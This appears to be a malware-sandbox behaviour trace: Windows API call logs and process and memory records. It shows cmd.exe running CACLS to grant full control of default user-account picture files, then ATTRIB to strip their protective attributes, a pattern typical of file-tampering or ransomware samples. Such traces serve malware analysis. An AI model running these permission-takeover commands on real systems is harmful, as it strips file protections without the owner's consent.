[0179.969] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0179.970] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0179.970] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0179.970] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0179.970] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0179.970] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0179.970] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0179.970] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0179.970] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0179.970] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0179.970] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0179.970] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0179.970] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0179.970] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0179.970] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0179.970] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0179.970] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0179.970] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0179.970] SetErrorMode (uMode=0x0) returned 0x0 [0179.970] SetErrorMode (uMode=0x1) returned 0x0 [0179.971] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361e98, lpFilePart=0x26ef04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ef04*="Desktop") returned 0x18 [0179.971] SetErrorMode (uMode=0x0) returned 0x1 [0179.971] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.971] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.976] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x362180 [0179.977] FindClose (in: hFindFile=0x362180 | out: hFindFile=0x362180) returned 1 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x362180 [0179.977] FindClose (in: hFindFile=0x362180 | out: hFindFile=0x362180) returned 1 [0179.977] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.977] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.977] GetConsoleTitleW (in: lpConsoleTitle=0x26f178, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.978] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f0c8 | out: lpAttributeList=0x26f000, lpSize=0x26f0c8) returned 1 [0179.978] UpdateProcThreadAttribute (in: lpAttributeList=0x26f000, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f0c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f000, lpPreviousValue=0x0) returned 1 [0179.978] GetStartupInfoW (in: lpStartupInfo=0x26efbc | out: lpStartupInfo=0x26efbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0179.978] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.979] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f05c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0a8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26f0a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbd0, dwThreadId=0x678)) returned 1 [0179.981] CloseHandle (hObject=0x4c) returned 1 [0179.981] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.981] GetEnvironmentStringsW () returned 0x360308* [0179.982] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.982] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0180.019] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ef9c | out: lpExitCode=0x26ef9c*=0x0) returned 1 [0180.019] CloseHandle (hObject=0x50) returned 1 [0180.019] _vsnwprintf (in: _Buffer=0x26f0e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26efa8 | out: _Buffer="00000000") returned 8 [0180.019] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.019] GetEnvironmentStringsW () returned 0x362410* [0180.019] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.019] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.019] GetEnvironmentStringsW () returned 0x362410* [0180.019] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.019] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f000 | out: lpAttributeList=0x26f000) [0180.019] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.020] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.020] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.020] GetLastError () returned 0x2 [0180.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.020] GetLastError () returned 0x2 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x35e4d8 [0180.021] FindClose (in: hFindFile=0x35e4d8 | out: hFindFile=0x35e4d8) returned 1 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.021] GetLastError () returned 0x2 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x35e4d8 [0180.021] FindClose (in: hFindFile=0x35e4d8 | out: hFindFile=0x35e4d8) returned 1 [0180.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.021] GetConsoleTitleW (in: lpConsoleTitle=0x26f178, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.021] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f0c8 | out: lpAttributeList=0x26f000, lpSize=0x26f0c8) returned 1 [0180.021] UpdateProcThreadAttribute (in: lpAttributeList=0x26f000, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f0c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f000, lpPreviousValue=0x0) returned 1 [0180.021] GetStartupInfoW (in: lpStartupInfo=0x26efbc | out: lpStartupInfo=0x26efbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.022] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.022] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f05c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessInformation=0x26f0a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcbc, dwThreadId=0xbb4)) returned 1 [0180.023] CloseHandle (hObject=0x50) returned 1 [0180.023] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.023] GetEnvironmentStringsW () returned 0x362410* [0180.023] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.023] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0180.059] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26ef9c | out: lpExitCode=0x26ef9c*=0x0) returned 1 [0180.059] CloseHandle (hObject=0x4c) returned 1 [0180.059] _vsnwprintf (in: _Buffer=0x26f0e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26efa8 | out: _Buffer="00000000") returned 8 [0180.059] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.059] GetEnvironmentStringsW () returned 0x362410* [0180.060] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.060] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.060] GetEnvironmentStringsW () returned 0x362410* [0180.060] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.060] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f000 | out: lpAttributeList=0x26f000) [0180.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.060] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.060] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.060] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.061] SetConsoleInputExeNameW () returned 0x1 [0180.061] GetConsoleOutputCP () returned 0x1b5 [0180.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.061] exit (_Code=0) Process: id = "332" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ee0" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "331" os_parent_pid = "0x47c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25079 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25081 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25082 start_va = 0x950000 end_va = 0x958fff entry_point = 0x950000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25086 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25088 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25089 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25090 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25091 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25092 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 25093 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25094 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25095 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25096 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25097 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25098 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25099 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 454 os_tid = 0x678 Thread: id = 455 os_tid = 0xc48 Process: id = "333" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "331" os_parent_pid = "0x47c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25103 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25104 start_va = 0x2b0000 end_va = 0x2b6fff entry_point = 0x2b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25108 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25112 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25113 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 25114 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 25115 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25117 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25118 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25119 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25120 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25121 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25122 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25123 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25124 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25125 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25126 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25127 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25128 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25129 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 456 os_tid = 0xbb4 Process: id = "334" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25130 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25131 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25132 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25133 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25134 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25135 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25136 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25137 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25138 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 25139 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 